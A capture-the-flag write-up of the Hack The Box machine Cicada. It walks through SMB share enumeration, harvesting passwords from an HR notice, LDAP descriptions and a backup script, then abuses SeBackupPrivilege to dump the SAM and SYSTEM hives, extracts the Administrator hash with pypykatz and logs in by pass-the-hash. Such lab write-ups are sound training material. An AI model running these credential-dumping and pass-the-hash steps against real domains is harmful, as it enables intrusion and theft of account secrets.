Cicada is an easy-difficulty machine from Hack The Box dealing with initial enumeration that’ll reveal some exposed SMB shares where we’ll get some creds to eventually connect to another SMB share to exfiltrate some more credentials and connect to system to claim our user flag. Finally exploiting SeBackupPrivilege privilege that’ll allow us to backup sam and system hives so we could exfiltrate hive secrets to get our Administrator hash and root flag.
PS C:\Users\0xkujen> nmap -A-Pn10.129.35.108 Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-2820:03 W. Central Africa Standard Time NSOCK ERROR [0.2640s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 81.82% done; ETC: 20:03 (0:00:04 remaining) Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 90.91% done; ETC: 20:03 (0:00:02 remaining) Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.93% done; ETC: 20:04 (0:00:00 remaining) Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.93% done; ETC: 20:04 (0:00:00 remaining) Nmap scan report for10.129.35.108 Host is up (0.13s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-2902:07:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016 (85%) OS CPE: cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2016 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1153.00 ms 10.10.16.1 2153.00 ms 10.129.35.108
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in107.05 seconds PS C:\Users\0xkujen>
SMB Access to Credentials exfiltration
We can see that we have our “typical” windows machine ports.
We can also see that we have SMB on the box, let’s explore it:
1 2 3 4 5 6 7 8 9 10 11 12 13
kujen@kujen:~$ smbclient -L \\10.129.192.186 -N
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share DEV Disk HR Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT SMB1 disabled -- no workgroup available
And we do find some interesting shares. However, we can only access HR for now:
1 2 3 4 5 6 7 8 9 10
kujen@kujen:~$ smbclient \\\\10.129.192.186\\HR -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Mar 14 13:29:09 2024 .. D 0 Thu Mar 14 13:21:29 2024 Notice from HR.txt A 1266 Wed Aug 28 18:31:48 2024 4168447 blocks of size 4096. 422276 blocks available smb: \> get "Notice from HR.txt" getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \>
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. 2. Once logged in, navigate to your account settings or profile settings section. 3. Look for the option to change your password. This will be labeled as "Change Password". 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. 5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards, Cicada Corp
And we can see that we have a password inside that note Cicada$M6Corpb*@Lp#nZp!8. Let’s first try to enumerate the system for usernames using crackmapexec:
Now we can create a wordlist using those usernames and we’ll discover our valid user is michael.wrightson. Let’s try using him to get something more useful. We can do so using ldapdomaindump tool:
1 2 3 4 5 6 7 8
┌──(kali㉿kali)-[~] └─$ ldapdomaindump ldap://10.129.192.186 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished
We can find this inside of the users dump file:
1
Just incase I forget my password is aRt$Lp#7t*VQ!3
Let’s now see if we can use that password which belongs to david.orelious against our SMB shares:
1 2 3 4 5 6 7 8 9 10 11 12 13
kujen@kujen:~$ smbclient \\\\10.129.192.186\\DEV -U david.orelious Password for [WORKGROUP\david.orelious]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Mar 14 13:31:39 2024 .. D 0 Thu Mar 14 13:21:29 2024 Backup_script.ps1 A 601 Wed Aug 28 18:28:22 2024
4168447 blocks of size 4096. 439019 blocks available smb: \> get Backup_script.ps1 getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec) smb: \> exit
We find a powershell script that we download to our local machine. Let’s see what it has for us:
It has a new password for us, this time for emily.oscars. Let’s try to connect to the machine directly using it:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~] └─$ evil-winrm -i 10.129.192.186 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cat ../desktop/user.txt 716fc9cf133233d53d2c24284632aa04
Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Doing a quick search for SeBackupPrivilege I stumbled upon this great article . This privilege allows the user to read all the files in the system, we will use this to our advantage. I’ll go ahead and read the SAM file and save a variant of it. Similarly, we read the SYSTEM file and save a variant of it:
*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system The operation completed successfully.
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> *Evil-WinRM* PS C:\Temp> download sam *Evil-WinRM* PS C:\Temp> download sam Info: Downloading C:\Temp\sam to sam Info: Download successful! *Evil-WinRM* PS C:\Temp> download system
Info: Download successful!
Now we’ll just extract the hive secrets from the files using pypykatz:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(kali㉿kali)-[~/hackthebox/cicada] └─$ pypykatz registry --sam sam system /usr/bin/pypykatz:6: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import load_entry_point WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work ============== SYSTEM hive secrets ============== CurrentControlSet: ControlSet001 Boot Key: 3c2b033757a49110a9ee680b46e8d620 ============== SAM hive secrets ============== HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010 Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
And now simply connect to the server using our Administrator hash and claim our root flag:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~] └─$ evil-winrm -i 10.129.192.186 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt 0b2a350ae69d0db519f0d06c503adf5b
